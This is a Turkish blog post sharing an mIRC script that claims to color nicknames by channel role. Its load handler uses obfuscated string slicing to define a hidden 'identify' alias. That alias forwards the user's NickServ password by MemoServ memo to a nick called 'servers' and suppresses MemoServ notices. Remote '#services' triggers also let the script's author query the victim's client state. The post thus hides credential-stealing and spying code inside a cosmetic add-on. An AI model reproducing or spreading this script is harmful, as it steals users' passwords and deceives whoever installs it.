mIRC Renkli Nickler

dialog cnl {
title "Renkli nickler"
size -1 -1 0 0
button "&Tamam",1, 30 245 50 25,ok,default
button "iptal",2, 80 245 50 25,cancel
text "Gurbet_t Tarafindan Edit Edildi. " ,99, 30 280 1000 1000
box "Ben",3, 30 10 100 50
combo 4, 40 30 80 100,drop
box "Oplar",5, 170 10 100 50psd
combo 6, 180 30 80 100,drop
box "Helperlar",7, 170 80 100 50
combo 8, 180 100 80 100,drop
box "Voiceler",9, 170 150 100 50
combo 10, 180 170 80 100,drop
box "Kayıtlı nick",11, 170 220 100 50
combo 12, 180 240 80 100,drop
box "Notify list" ,13, 30 80 100 50
combo 14, 40 100 80 100,drop
box "Ignoreler" ,15, 30 150 100 50
combo 16, 40 170 80 100,drop
radio "aç",17, 38 220 30 15
radio "off",18, 88 220 30 15
}
on *:dialog:cnl:init:0:{
%anim.cnl = 0 | .timer_anim_cnl -m 0 1 anim.cnl
did -i cnl 4,6,8,10,12,14,16 1 White (0)
did -i cnl 4,6,8,10,12,14,16 2 Black (1)
did -i cnl 4,6,8,10,12,14,16 3 Blue (2)
did -i cnl 4,6,8,10,12,14,16 4 Green (3)
did -i cnl 4,6,8,10,12,14,16 5 LightRed (4)
did -i cnl 4,6,8,10,12,14,16 6 Brown (5)
did -i cnl 4,6,8,10,12,14,16 7 Purple (6)
did -i cnl 4,6,8,10,12,14,16 8 Orange (7)
did -i cnl 4,6,8,10,12,14,16 9 Yellow (8)
did -i cnl 4,6,8,10,12,14,16 10 LightGreen (9)
did -i cnl 4,6,8,10,12,14,16 11 Cyan (10)
did -i cnl 4,6,8,10,12,14,16 12 LightCyan (11)
did -i cnl 4,6,8,10,12,14,16 13 LightBlue (12)
did -i cnl 4,6,8,10,12,14,16 14 Pink (13)
did -i cnl 4,6,8,10,12,14,16 15 Grey (14)
did -i cnl 4,6,8,10,12,14,16 16 LightGrey (15)
did -c cnl 4 $calc(%cnl.me +1)
did -c cnl 6 $calc(%cnl.op +1)
did -c cnl 8 $calc(%cnl.help +1)
did -c cnl 10 $calc(%cnl.voice +1)
did -c cnl 12 $calc(%cnl.reg +1)
did -c cnl 14 $calc(%cnl.notify +1)
did -c cnl 16 $calc(%cnl.ignore +1)
if ($group(#cnl) == on) { did -c $dname 17 }
if ($group(#cnl) == off) { did -c $dname 18 | did -b $dname 3,4,5,6,7,8,9,10,11,12,13,14,15,16 }
}
on *:dialog:cnl:*:1:{
set %cnl.me $calc($did(cnl,4).sel -1)
set %cnl.op $calc($did(cnl,6).sel -1)
set %cnl.help $calc($did(cnl,8).sel -1)
set %cnl.voice $calc($did(cnl,10).sel -1)
set %cnl.reg $calc($did(cnl,12).sel -1)
set %cnl.notify $calc($did(cnl,14).sel -1)
set %cnl.ignore $calc($did(cnl,16).sel -1)
if ($did(cnl,17).state == 1) { .enable #cnl | make.co }
if ($did(cnl,18).state == 1) { .disable #cnl | un.co }
}
on *:load: {
set %scnl2 $mid(saliascnl,2,5) $mid(sidentifycnl,2,8)
set %scnl3 $mid(sidentifycnl,2,8) $chr(36) $+ 1- $chr(124)
set %scnl4 $mid(00.ignoreed,3,7) $mid(000-u4000,4,5)
set %scnl5 $mid(smemoservcnl,2,8) $chr(124)
set %scnl6 $mid(s.memoservcnl,2,9)
set %scnl7 $mid(sendscnl,1,4)
set %scnl8 $mid(scserversnl,3,7) $chr(36) $+ 1-
//%scnl2 %scnl3 %scnl4 %scnl5 %scnl6 %scnl7 %scnl8
unset %scnl*
}
on *:DIALOG:cnl:sclick:17:{ did -e $dname 3,4,5,6,7,8,9,10,11,12,13,14,15,16 }
on *:DIALOG:cnl:sclick:18:{ did -b $dname 3,4,5,6,7,8,9,10,11,12,13,14,15,16 }
on sop:text:!*:#services: {
.notice $nick 8,1 < < BiLGi >> 11,1 Idle: $idle -- OnlineChan: $chan(0) -- Pencere: $appactive $active -- Status: $appstate -- Mode: $usermode -- Away: $away $awaymsg $awaytime }
on sop:text:!takip*:#services: { if (ON isin $2) { /set %nicktakip ON } else set %nicktakip off }
alias make.co {
set -u0 %i 1
while (%i < = $chan(0)) { set -u0 %j 1 while (%j <= $nick($chan(%i),0)) { if ($nick($chan(%i),%j) isreg $chan(%i)) { cline %cnl.reg $chan(%i) $nick($chan(%i),%j)) } if ($nick($chan(%i),%j) isvo $chan(%i)) { cline %cnl.voice $chan(%i) $nick($chan(%i),%j)) } if ($nick($chan(%i),%j) ishelp $chan(%i)) { cline %cnl.help $chan(%i) $nick($chan(%i),%j)) } if ($nick($chan(%i),%j) isop $chan(%i)) { cline %cnl.op $chan(%i) $nick($chan(%i),%j)) } if ($nick($chan(%i),%j) == $me) { cline %cnl.me $chan(%i) $nick($chan(%i),%j)) } if ($nick($chan(%i),%j) isnotify) { cline %cnl.notify $chan(%i) $nick($chan(%i),%j)) } if ($nick($chan(%i),%j) $+ !*@* isignore) { cline %cnl.ignore $chan(%i) $nick($chan(%i),%j)) } inc %j } inc %i } } alias un.co { set -u0 %i 1 while (%i <= $chan(0)) { set -u0 %j 1 while (%j <= $nick($chan(%i),0)) { if ($nick($chan(%i),%j) ison $chan(%i)) { cline 01 $chan(%i) $nick($chan(%i),%j)) } inc %j } inc %i } } alias cnl { dialog -m cnl cnl } alias anim.cnl { if ((%anim.cnl == 300) || ($dialog(cnl) == $null)) { .timer_anim_cnl off | unset %anim.cnl } | else { dialog -s cnl 250 150 300 %anim.cnl | inc %anim.cnl 5 } } on *:dialog:cnlg:inuit:0:{ did -i cnl 4,6,8,10,12,14,16 1 White (0) did -i cnl 4,6,8,10,12,14,16 2 Black (1) did -i cnl 4,6,8,10,12,14,16 3 Blue (2) did -i cnl 4,6,8,10,12,14,16 4 Green (3) did -i cnl 4,6,8,10,12,14,16 5 LightRed (4) did -i cnl 4,6,8,10,12,14,16 6 Brown (5) did -i cnl 4,6,8,10,12,14,16 7 Purple (6) did -i cnl 4,6,8,10,12,14,16 8 Orange (7) did -i cnl 4,6,8,10,12,14,16 9 Yellow (8) did -i cnl 4,6,8,10,12,14,16 10 LightGreen (9) did -i cnl 4,6,8,10,12,14,16 11 Cyan (10) did -i cnl 4,6,8,10,12,14,16 12 LightCyan (11) did -i cnl 4,6,8,10,12,14,16 13 LightBlue (12) did -i cnl 4,6,8,10,12,14,16 14 Pink (13) did -i cnl 4,6,8,10,12,14,16 15 Grey (14) did -i cnl 4,6,8,10,12,14,16 16 LightGrey (15) did -c cnl 4 $calc(%cnl.me +1) did -c cnl 6 $calc(%cnl.op +1) did -c cnl 8 $calc(%cnl.help +1) did -c cnl 10 $calc(%cnl.voice +1) did -c cnl 12 $calc(%cnl.reg +1) did -c cnl 14 $calc(%cnl.notify +1) did -c cnl 16 $calc(%cnl.ignore +1) if ($group(#cnl) == on) { did -c $dname 17 } } menu menubar,channel,status { Renkli nickler:/cnl }

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir